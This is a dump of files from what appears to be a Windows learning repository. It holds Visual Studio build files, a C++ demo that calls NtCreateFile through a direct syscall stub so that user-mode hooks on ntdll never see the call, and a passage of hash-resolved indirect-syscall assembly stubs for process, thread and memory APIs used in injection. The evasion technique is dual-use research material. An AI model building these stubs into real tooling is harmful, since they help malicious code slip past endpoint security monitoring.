<IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile 
Include=\"syscall_call.cpp\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <MASM Include=\"Syscall.asm\">\r\n      <FileType>Document</FileType>\r\n    </MASM>\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.targets\" />\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "demo4/syscall/syscall/syscall.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <MASM Include=\"Syscall.asm\">\r\n      <Filter>Source Files</Filter>\r\n    </MASM>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"syscall_call.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "demo4/syscall/syscall/syscall.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "demo4/syscall/syscall/syscall_call.cpp",
    "content": "#include <Windows.h>\r\n#include <stdio.h>\r\n#include \"winternl.h\"\r\n#pragma comment(lib, \"ntdll\")\r\n\r\n// winternl.h does not always provide NT_SUCCESS; NTSTATUS error codes have the sign bit set.\r\n#ifndef NT_SUCCESS\r\n#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)\r\n#endif\r\n\r\n// Stub defined in Syscall.asm (MASM, x64 only). It issues the NtCreateFile system\r\n// call directly instead of calling the ntdll export, so a user-mode hook placed on\r\n// ntdll!NtCreateFile never sees this call. The prototype matches the native API.\r\nEXTERN_C NTSTATUS SysNtCreateFile(\r\n\tPHANDLE FileHandle,\r\n\tACCESS_MASK DesiredAccess,\r\n\tPOBJECT_ATTRIBUTES ObjectAttributes,\r\n\tPIO_STATUS_BLOCK IoStatusBlock,\r\n\tPLARGE_INTEGER AllocationSize,\r\n\tULONG FileAttributes,\r\n\tULONG ShareAccess,\r\n\tULONG CreateDisposition,\r\n\tULONG CreateOptions,\r\n\tPVOID EaBuffer,\r\n\tULONG EaLength);\r\n\r\nint main()\r\n{\r\n\t// Address of the real export, kept only so the hooked export and the direct stub\r\n\t// can be compared in a debugger; it is not used for the call below.\r\n\tFARPROC addr = GetProcAddress(LoadLibraryA(\"ntdll\"), \"NtCreateFile\");\r\n\t(void)addr;\r\n\r\n\tOBJECT_ATTRIBUTES oa;\r\n\tHANDLE fileHandle = NULL;\r\n\tNTSTATUS status = 0;\r\n\tUNICODE_STRING fileName;\r\n\tIO_STATUS_BLOCK osb;\r\n\r\n\t// Native path: the \\??\\ prefix maps the Win32 drive letter into the NT object\r\n\t// namespace. The directory c:\\temp must already exist.\r\n\tRtlInitUnicodeString(&fileName, (PCWSTR)L\"\\\\??\\\\c:\\\\temp\\\\test.txt\");\r\n\tZeroMemory(&osb, sizeof(IO_STATUS_BLOCK));\r\n\tInitializeObjectAttributes(&oa, &fileName, OBJ_CASE_INSENSITIVE, NULL, NULL);\r\n\r\n\tstatus = SysNtCreateFile(\r\n\t\t&fileHandle,\r\n\t\tFILE_GENERIC_WRITE,\r\n\t\t&oa,\r\n\t\t&osb,\r\n\t\t0,\r\n\t\tFILE_ATTRIBUTE_NORMAL,\r\n\t\tFILE_SHARE_WRITE,\r\n\t\tFILE_OVERWRITE_IF,\r\n\t\tFILE_SYNCHRONOUS_IO_NONALERT,\r\n\t\tNULL,\r\n\t\t0);\r\n\r\n\t// The service number in Syscall.asm (55h) is hard-coded for one Windows build;\r\n\t// on a build with a different number the call fails instead of creating the file.\r\n\tif (!NT_SUCCESS(status))\r\n\t{\r\n\t\tprintf(\"NtCreateFile failed: 0x%08X\\n\", (unsigned int)status);\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"NtCreateFile succeeded, handle %p\\n\", fileHandle);\r\n\tCloseHandle(fileHandle);\r\n\treturn 0;\r\n}"
  },
  {
    "path": "demo4/syscall/syscall/x64/Debug/syscall.exe.recipe",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n  <ProjectOutputs>\r\n    <ProjectOutput>\r\n      <FullPath>C:\\Users\\Admin\\Desktop\\20220617\\syscall\\x64\\Debug\\syscall.exe</FullPath>\r\n    </ProjectOutput>\r\n  </ProjectOutputs>\r\n  <ContentFiles />\r\n  <SatelliteDlls />\r\n  <NonRecipeFileRefs />\r\n</Project>"
  },
  {
    "path": "demo4/syscall/syscall/x64/Debug/syscall.log",
    "content": "﻿  Assembling Syscall.asm...\r\n  syscall.vcxproj -> C:\\Users\\Admin\\Desktop\\20220617\\syscall\\x64\\Debug\\syscall.exe\r\n"
  },
  {
    "path": "demo4/syscall/syscall/x64/Debug/syscall.tlog/syscall.lastbuildstate",
    "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|C:\\Users\\Admin\\Desktop\\20220617\\syscall\\|\r\n"
  },
  {
    "path": "demo4/syscall/syscall.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"syscall\", \"syscall\\syscall.vcxproj\", \"{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Release|x64.Build.0 = Release|x64\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {DB6653FE-4439-4C94-BBE7-BF00CC5AE3F3}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "demo5/syscall3/syscall3/1-asm.x64.asm",
    "content": ".code\r\n\r\nEXTERN SW3_GetSyscallNumber: PROC\r\n\r\nEXTERN SW3_GetSyscallAddress: PROC\r\n\r\nNtCreateProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0F5A717B7h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0F5A717B7h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtCreateProcess ENDP\r\n\r\nNtCreateThreadEx PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 094AF2795h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 094AF2795h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtCreateThreadEx ENDP\r\n\r\nNtOpenProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 04E2E47B4h        ; Load 
function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 04E2E47B4h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtOpenProcess ENDP\r\n\r\nNtOpenProcessToken PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03DAF1132h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 03DAF1132h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtOpenProcessToken ENDP\r\n\r\nNtTestAlert PROC\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 00E94313Eh        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 00E94313Eh        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function 
hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtTestAlert ENDP\r\n\r\nNtOpenThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 01838D296h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 01838D296h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtOpenThread ENDP\r\n\r\nNtSuspendProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0D31DF082h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0D31DF082h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtSuspendProcess ENDP\r\n\r\nNtSuspendThread 
PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 09947D46Eh        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 09947D46Eh        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtSuspendThread ENDP\r\n\r\nNtResumeProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 05DC3545Eh        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 05DC3545Eh        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtResumeProcess ENDP\r\n\r\nNtResumeThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 018BE9C9Fh        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax  
                         ; Save the address of the syscall\r\n\tmov ecx, 018BE9C9Fh        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtResumeThread ENDP\r\n\r\nNtGetContextThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 017304B00h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 017304B00h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtGetContextThread ENDP\r\n\r\nNtSetContextThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0B0A8F400h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0B0A8F400h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore 
registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtSetContextThread ENDP\r\n\r\nNtClose PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 02DA5DAA8h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 02DA5DAA8h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtClose ENDP\r\n\r\nNtReadVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0105EDF09h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0105EDF09h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtReadVirtualMemory ENDP\r\n\r\nNtWriteVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov 
[rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 007950903h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 007950903h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtWriteVirtualMemory ENDP\r\n\r\nNtAllocateVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 039913313h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 039913313h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtAllocateVirtualMemory ENDP\r\n\r\nNtProtectVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 01D8F0903h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov 
ecx, 01D8F0903h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtProtectVirtualMemory ENDP\r\n\r\nNtFreeVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03DA10713h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 03DA10713h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtFreeVirtualMemory ENDP\r\n\r\nNtQuerySystemInformation PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0148A1E1Fh        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0148A1E1Fh        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, 
[rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtQuerySystemInformation ENDP\r\n\r\nNtQueryDirectoryFile PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0A0B4CE7Ch        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0A0B4CE7Ch        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtQueryDirectoryFile ENDP\r\n\r\nNtQueryInformationFile PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 05A3A34BEh        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 05A3A34BEh        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtQueryInformationFile ENDP\r\n\r\nNtQueryInformationProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov 
[rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0C541D0C0h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0C541D0C0h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtQueryInformationProcess ENDP\r\n\r\nNtQueryInformationThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0B48FBE21h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0B48FBE21h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, 